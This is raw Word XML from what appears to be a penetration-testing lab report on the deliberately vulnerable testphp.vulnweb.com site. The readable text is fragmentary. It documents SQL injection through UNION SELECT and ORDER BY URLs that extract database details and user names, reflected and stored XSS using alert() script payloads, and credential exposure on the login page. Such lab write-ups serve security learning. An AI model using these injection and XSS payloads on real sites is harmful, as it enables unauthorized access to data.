        <w:ind w:firstLine="720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6128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6226F0E1" wp14:editId="0AF3D36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79255" cy="5806943"/>
            <wp:effectExtent l="0" t="0" r="7620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1345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3E77F8E3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1B93E67F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13FE5B4C" w14:textId="000134D0" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="003B071C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we got 8 columns inside </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20013F30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</w:p>
    <w:p w14:paraId="2C0F7816" w14:textId="287575BA" w:rsidR="003B071C" w:rsidRPr="00111B61" w:rsidRDefault="003B071C" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D322E6C" w14:textId="77CEAF60" w:rsidR="003B071C" w:rsidRPr="00111B61" w:rsidRDefault="00EF0435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lastRenderedPageBreak/>
        <w:t xml:space="preserve">We are going to extract name of user inside </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F31DF6" w14:textId="778445C4" w:rsidR="00FE7E49" w:rsidRPr="00111B61" w:rsidRDefault="003B071C" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,name,3,4,5,6,7,8,9,10,11%20from%20users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41D11559" w14:textId="77777777" w:rsidR="00FE7E49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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47023DA8" wp14:editId="3C04400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212532" cy="6439458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A37E2" w14:textId="6865F865" w:rsidR="008938E2" w:rsidRPr="00111B61" w:rsidRDefault="008938E2" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3B6772" w14:textId="7CC80BD0" w:rsidR="008938E2" w:rsidRPr="00111B61" w:rsidRDefault="006857CE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we got user name </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>as JOHN SMITH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6744B762" w14:textId="5CCE2303" w:rsidR="00FD41C0" w:rsidRPr="00111B61" w:rsidRDefault="008938E2" w:rsidP="00111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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="008A298C" w:rsidRPr="00111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E66387"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Back </w:t>
      </w:r>
      <w:r w:rsidR="006857CE" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Button Bowering</w:t>
      </w:r>
      <w:r w:rsidR="008A298C"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D6E5BD3" w14:textId="4565BD9E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63E5460" wp14:editId="6B282419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943600" cy="4521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B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">url: </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/userinfo.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55D73472" w14:textId="32ECE6F9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6446ABED" w14:textId="063E972A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2A39E799" w14:textId="0A769B0C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0326D343" w14:textId="038351CA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5FE55872" w14:textId="7DFDBAC8" w:rsidR="00FD41C0" w:rsidRPr="00111B61" w:rsidRDefault="00FD41C0" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F3737C" w14:textId="15CD0576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5573F2E" w14:textId="2F1FB43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6E512FB1" w14:textId="3B9F7C5B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0728DFD" w14:textId="75BE286E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1B21F82D" w14:textId="013AA5B3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41F38537" w14:textId="364A69DF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5ADD03D0" w14:textId="2B0CD8C2" w:rsidR="00E66387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1D232CC1" wp14:editId="29CFDCAF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>30480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>586105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="490982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B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We were logged in as test user when back button was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>press</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> we got redirected on login page credential with in it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640647DB" w14:textId="78930987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3BE17BE6" w14:textId="545B0A22" w:rsidR="008A298C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</w:p>
    <w:p w14:paraId="43A0A38D" w14:textId="77777777" w:rsidR="008A298C" w:rsidRPr="00111B61" w:rsidRDefault="008A298C" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A256DEB" w14:textId="38F6BAC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6C67EEB5" w14:textId="6A3D791B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535BFB9D" w14:textId="0AD0AB14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023FC71B" w14:textId="63C60A0F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3F7CC495" w14:textId="308E5E86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60CCFEB7" w14:textId="335489A0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4D307C1E" w14:textId="58165F31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D08AC5C" w14:textId="1FD39CBE" w:rsidR="00E66387" w:rsidRPr="00111B61" w:rsidRDefault="008A298C" w:rsidP="00111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E66387"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Sensitive </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B6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E66387"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ata </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61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E66387" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59559E29" w14:textId="318403B3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 xml:space="preserve">url: </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BE2A229" w14:textId="272AF711" w:rsidR="00E66387" w:rsidRPr="00111B61" w:rsidRDefault="0048362D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</w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008A298C" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>his login page show</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> username and password directly on page </w:t>
      </w:r>
      <w:r w:rsidR="008A298C" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A298C"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05B80584" wp14:editId="2B5DEFF6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943600" cy="31908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8CBAD" w14:textId="5055573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4FF6FD5" w14:textId="0672279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64653380" w14:textId="1975B46E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5397AE43" w14:textId="7D05130F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46B914AB" w14:textId="455AC574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4655CB1B" w14:textId="645DAE16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8EC75AE" w14:textId="226B7F6F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11049C78" w14:textId="78F3649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2C66A2CA" w14:textId="787FE031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5CC8BC93" w14:textId="1BF72826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3CBFDFD" w14:textId="73DBB7FC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4F2E4019" w14:textId="3C5DDB2B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7ADE386" w14:textId="36551DA5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7A5F0DF1" w14:textId="2BA6CFF0" w:rsidR="0048362D" w:rsidRPr="00111B61" w:rsidRDefault="0048362D" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3983E78E" w14:textId="77777777" w:rsidR="0048362D" w:rsidRPr="00111B61" w:rsidRDefault="0048362D" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279937FB" w14:textId="77777777" w:rsidR="0048362D" w:rsidRPr="00111B61" w:rsidRDefault="0048362D" w:rsidP="00111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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F03E5F" w14:textId="3DF6BF8E" w:rsidR="00E66387" w:rsidRPr="00111B61" w:rsidRDefault="0048362D" w:rsidP="00111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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00E66387" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>eflected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4231436F" w14:textId="0172FA45" w:rsidR="0048362D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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F50D51" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="0048362D" w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/search.php?test=query</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0048362D" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67217F6B" w14:textId="08EF862D" w:rsidR="0048362D" w:rsidRPr="00111B61" w:rsidRDefault="0048362D" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: &lt;script&gt;alert (“2022”) &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A842382" w14:textId="4E23FD3B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A21FB50" wp14:editId="55B6A463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943600" cy="4606925"/>
            <wp:effectExtent l="0" t="0" r="0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2254" w14:textId="5ACD4FA4" w:rsidR="00E66387" w:rsidRPr="00111B61" w:rsidRDefault="00E66387" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11753314" w14:textId="3E504DEF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29CA9FC5" w14:textId="5D600927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484C0D09" w14:textId="289CF361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2831934D" w14:textId="10ECBA41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64B21BD0" w14:textId="1FE1F05A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39CE74DA" w14:textId="4065A5F6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169CB53F" w14:textId="14E1F46D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3B6AB877" w14:textId="08336FEC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3859572C" w14:textId="59A585DF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E0D9CD2" wp14:editId="2B45F1D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23012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E204B" w14:textId="355B9EDF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16EA9BB8" w14:textId="438F6DB9" w:rsidR="00F50D51" w:rsidRPr="00111B61" w:rsidRDefault="00F50D51" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70713855" w14:textId="428B04D2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6A44D483" w14:textId="6D9998D4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888E4CB" w14:textId="76BE093F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7375BD5B" w14:textId="06EE357D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7B869F66" w14:textId="769E0596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27493D4F" w14:textId="3FC1D63E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0A44DA80" w14:textId="0E7F090A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A8A8260" w14:textId="6EB86A20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3CC31E1" w14:textId="3BA26014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5F4CA2D9" w14:textId="1A1058E5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002EF88D" w14:textId="2501E4E8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54B76E26" w14:textId="1C09962D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6D3052E" w14:textId="587A7E77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6E528361" w14:textId="6E870C82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4DF7C333" w14:textId="35084BA0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1A4A19A3" w14:textId="27C633E5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79C19C13" w14:textId="138D7479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4BA0B44" w14:textId="604F0A37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5908A833" w14:textId="1193E581" w:rsidR="0048362D" w:rsidRPr="00111B61" w:rsidRDefault="0048362D" w:rsidP="00111B6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1B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 XSS Stored </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5F4EC" w14:textId="12D6E558" w:rsidR="00B33DFD" w:rsidRPr="00111B61" w:rsidRDefault="00B33DFD" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="00111B61">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/guestbook.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0048362D" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59292108" w14:textId="63897908" w:rsidR="0048362D" w:rsidRPr="00111B61" w:rsidRDefault="00FE7E49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Style w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>: &lt;script&gt;alert(“hacked</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>”)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43978C08" w14:textId="0F95A99C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D031F9C" wp14:editId="289FA262">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4204335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="271780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1B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54224DC5" wp14:editId="49A30DF9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387794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9E694" w14:textId="6833356E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766CD523" w14:textId="0F2553EF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2611B27F" w14:textId="151DE6FD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37332E62" w14:textId="72C6F301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  <w:r w:rsidRPr="00111B6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CBFBB17" wp14:editId="3977CDDF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943600" cy="27178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E49" w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00111B61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">fter refreshing page </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5328B90C" w14:textId="2586C7DE" w:rsidR="00B33DFD" w:rsidRPr="00111B61" w:rsidRDefault="00B33DFD" w:rsidP="00111B61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1056"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAE552F" w14:textId="77777777" w:rsidR="00B33DFD" w:rsidRPr="00111B61" w:rsidRDefault="00B33DFD" w:rsidP="00111B61">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1056"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2162FB76" w14:textId="6D55AA84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0A7B8331" w14:textId="3F649E61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121CD631" w14:textId="7751DF4D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1AF09472" w14:textId="1A7B9C7A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132EBD9A" w14:textId="032C8927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5E96463A" w14:textId="46110D98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174347A1" w14:textId="39A13364" w:rsidR="00B33DFD" w:rsidRPr="00111B61" w:rsidRDefault="00B33DFD" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783D6362" w14:textId="661AA18F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p w14:paraId="26B4C7A3" w14:textId="005B8625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p w14:paraId="5235E952" w14:textId="7944CB40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p w14:paraId="5F364405" w14:textId="3FDC51B4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p w14:paraId="023730B9" w14:textId="1A54E3E1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p w14:paraId="45B6EAD5" w14:textId="55656C4A" w:rsidR="00D67063" w:rsidRPr="00111B61" w:rsidRDefault="00D67063" w:rsidP="00111B61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D67063" w:rsidRPr="00111B61" w:rsidSect="00D041F3">
      <w:headerReference w:type="default" r:id="rId4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4AAC1" w14:textId="77777777" w:rsidR="004E4D69" w:rsidRDefault="004E4D69" w:rsidP="00DB6A9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="25DF96B3" w14:textId="77777777" w:rsidR="004E4D69" w:rsidRDefault="004E4D69" w:rsidP="00DB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19AE5" w14:textId="77777777" w:rsidR="004E4D69" w:rsidRDefault="004E4D69" w:rsidP="00DB6A9F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B1BDFBE" w14:textId="77777777" w:rsidR="004E4D69" w:rsidRDefault="004E4D69" w:rsidP="00DB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61853515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4135510" w14:textId="78CD0342" w:rsidR="00DB6A9F" w:rsidRDefault="00DB6A9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2864149" w14:textId="77777777" w:rsidR="00DB6A9F" w:rsidRDefault="00DB6A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E2"/>
    <w:rsid w:val="00111606"/>
    <w:rsid w:val="00111B61"/>
    <w:rsid w:val="001167D2"/>
    <w:rsid w:val="001F4063"/>
    <w:rsid w:val="001F5C99"/>
    <w:rsid w:val="00247F23"/>
    <w:rsid w:val="00274B2D"/>
    <w:rsid w:val="002B01EF"/>
    <w:rsid w:val="00323E0F"/>
    <w:rsid w:val="003B071C"/>
    <w:rsid w:val="0048362D"/>
    <w:rsid w:val="004E4D69"/>
    <w:rsid w:val="005867D1"/>
    <w:rsid w:val="005B2ECA"/>
    <w:rsid w:val="005D5E8D"/>
    <w:rsid w:val="00601154"/>
    <w:rsid w:val="00646FA8"/>
    <w:rsid w:val="006540B7"/>
    <w:rsid w:val="006857CE"/>
    <w:rsid w:val="006C273B"/>
    <w:rsid w:val="00714D41"/>
    <w:rsid w:val="00736A21"/>
    <w:rsid w:val="00831CB8"/>
    <w:rsid w:val="008938E2"/>
    <w:rsid w:val="008A298C"/>
    <w:rsid w:val="009157E2"/>
    <w:rsid w:val="00982879"/>
    <w:rsid w:val="00A14D0A"/>
    <w:rsid w:val="00B31D43"/>
    <w:rsid w:val="00B33DFD"/>
    <w:rsid w:val="00C37BC5"/>
    <w:rsid w:val="00D041F3"/>
    <w:rsid w:val="00D67063"/>
    <w:rsid w:val="00DB1B97"/>
    <w:rsid w:val="00DB6A9F"/>
    <w:rsid w:val="00E66387"/>
    <w:rsid w:val="00E77683"/>
    <w:rsid w:val="00E8010F"/>
    <w:rsid w:val="00EB017A"/>
    <w:rsid w:val="00EF0435"/>
    <w:rsid w:val="00F50D51"/>
    <w:rsid w:val="00F705D3"/>
    <w:rsid w:val="00FD41C0"/>
    <w:rsid w:val="00FE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A7762"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{723C4C90-A13B-4E47-A06E-0C47E2E65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1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B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B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A9F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB6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estphp.vulnweb.com/login.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=1%20ORDER%20BY%201,2,3,4,5,6,7,8,9,10,11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://testphp.vulnweb.com/search.php?test=query" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/listproducts.php?cat=1%20ORDER%20BY%201,2,3,4,5,6,7,8,9,10,11,12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://testphp.vulnweb.com/guestbook.php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testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,version(),3,4,5,6,database(),8,system_user(),10,11" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,name,3,4,5,6,7,8,9,10,11%20from%20users" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 